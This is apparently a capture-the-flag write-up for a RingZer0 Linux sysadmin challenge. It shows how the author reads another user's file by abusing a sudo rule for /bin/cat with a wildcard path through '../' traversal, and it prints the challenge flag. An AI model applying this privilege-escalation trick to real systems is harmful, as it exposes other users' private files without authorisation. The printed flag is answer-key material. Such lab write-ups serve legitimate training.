RingZer0-90 - Sysadmin Linux Part 2 - Level 2
Sysadmin Linux part 6 - Level 2
Looking for a password
So we’re looking for neo’s password.
If we ls -l
the current folder we’ll see a file named phonebook.
ls -l
total 4
-rw-r----- 1 neo neo 124 Sep 20 2015 phonebook
We see that the file phonebook is own by neo.
Since we do not own the file we can’t file
or strings
it
Let’s look for the keyword “neo” is the system
cd \
grep -ri --exclude-dir={usr,proc,dev,sys} -w neo | less
The only interesting files is .bashrc that contains a message to Neo
cd
less .bashrc
We see some information in the last part of the .bashrc
hello neo ;)
echo Sup Neo!
$(ls -lart /home/neo)
cat phonebook
Maybe sudo ?
I had no clue what to do next, so i went try to see if i had access to any sudo commands
sudo -l
Got a major breakthough, we can run the following command as sudo
User trinity may run the following commands on this host:
(neo) /bin/cat /home/trinity/*
That means we can run a sudo command as neo using /bin/cat
on everyday that is located in /home/trinity/
sudo -u neo /bin/cat /home/trinity/*
The Oracle 1800-133-7133
Persephone 345-555-1244
copy made by Cypher copy utility on /home/neo/phonebook
There’s good information at the end of the file
First : Copy made by Cypher, that’s another user on the system
Second : The utility is on /home/neo/phonebook
We can now move around the system in cat
anything we want as neo
sudo -u neo /bin/cat /home/trinity/../neo/phonebook
The Oracle 1800-133-7133
Persephone 345-555-1244
change my current password FLAG-lRGLKGh2895wIAoOvcBbgk4oL
don‘t forget to remove this :)
The flag is : FLAG-lRGLKGh2895wIAoOvcBbgk4oL